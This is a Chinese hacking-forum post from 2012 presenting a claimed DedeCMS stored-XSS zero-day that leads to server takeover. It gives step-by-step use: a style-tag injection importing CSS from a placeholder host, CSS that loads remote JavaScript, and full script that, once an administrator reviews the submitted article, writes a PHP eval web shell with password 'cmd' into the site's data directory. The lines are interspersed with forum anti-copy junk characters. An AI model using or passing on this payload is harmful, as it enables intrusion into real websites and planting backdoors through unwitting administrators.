找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1851|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
% ]0 x. W. g. [* n5 q为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
( {! X$ t3 w  F/ l' Y, f+ ~目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
1 Q5 d1 y/ j) b8 e3 h下面说说利用方法。( }- R5 I. ]2 G9 z" u, M( w
条件有2个:: Z* E4 U) i: @7 f3 {
1.开启注册0 R- J2 X, U  `' b% [) A) t* S
2.开启投稿
* w' a8 `, q# r& u/ ~注册会员----发表文章( V$ m4 `! `$ F- @; r, P: U
内容填写:% l% ~* `. B4 l2 f4 W8 g  F1 [
复制代码7 n7 y! y9 s& [
<style>@im\port'\http://xxx.com/xss.css';</style>; t# P/ d" S: K/ v# S. A
新建XSS.Css, {: Z8 J% f9 [; ~5 u9 O
复制代码% h: r4 b. S+ J, W0 p
.body{
- Z7 A- s) @! G) I3 Dbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
* ?4 h7 W- a3 ~7 N! P$ s新建xss.js 内容为
. H% `# Q: D2 y; V6 W7 K. y复制代码9 T0 s* W( F7 A9 x7 [! Z0 x- V
1.var request = false;
  Q! T" Z* ?+ d2.if(window.XMLHttpRequest) {' T: ?/ v; [4 f; ]# P$ ~4 u
3.request = new XMLHttpRequest();( o, B) y1 u8 y$ J/ ~1 |. X1 Y. ?- ~
4.if(request.overrideMimeType) {& x: Q8 k0 K5 @! W+ V
5.request.overrideMimeType('text/xml');
+ _# K# x( `, d+ d8 G6 J% m) @% \6 U; s6.}0 \1 b' X; B' Y1 u8 F
7.} else if(window.ActiveXObject) {3 f6 X( f7 W3 N( B' q' {
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
: p9 H* f, |  J: W9.for(var i=0; i<versions.length; i++) {% W; E9 U5 M. A- `- Z
10.try {# `$ J( g8 m' K+ _
11.request = new ActiveXObject(versions);- x* Z, e; r" S* M5 ~
12.} catch(e) {}7 W+ J* N# K. Z; u: }, @7 A6 D$ P9 L/ R
13.}  i' J, }, [5 q. ^5 j2 i1 t
14.}
6 K( ]1 `& h8 m1 G: N; @) Y15.xmlhttp=request;+ `# U; O7 s  i- b  C. O
16.function getFolder( url ){- `7 Q9 z6 m: b2 u/ j# z
17. obj = url.split('/')
2 l9 `! w( Z- O) _$ H4 J# x+ U18. return obj[obj.length-2]
8 z9 o/ _1 o+ U( r# @% _6 N, _" k' ]19.}
0 G# k- i, i' ^: W  C20.oUrl = top.location.href;, Z. t: y8 K4 e" h1 V
21.u = getFolder(oUrl);4 {$ z) E- J- L8 z4 O
22.add_admin();
" j& q" [$ Y3 ?" }5 g23.function add_admin(){
5 A9 T( @. L4 h' `3 E9 {2 ]2 H24.var url= "/"+u+"/sys_sql_query.php";
* t4 v# V6 t# V6 \' w25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";: n) Z# ~# K% b  R9 N1 v
26.xmlhttp.open("POST", url, true);: _2 b/ q& O: [) Z8 q
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");4 w, t$ C/ A& |9 b/ z
28.xmlhttp.setRequestHeader("Content-length", params.length);; l: F4 T& Z3 g& c, B
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");$ f: }1 l: c3 W) U8 y4 b
30.xmlhttp.send(params);& o) @% x) J" c. \% f
31.}; a5 i" C# {' O
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表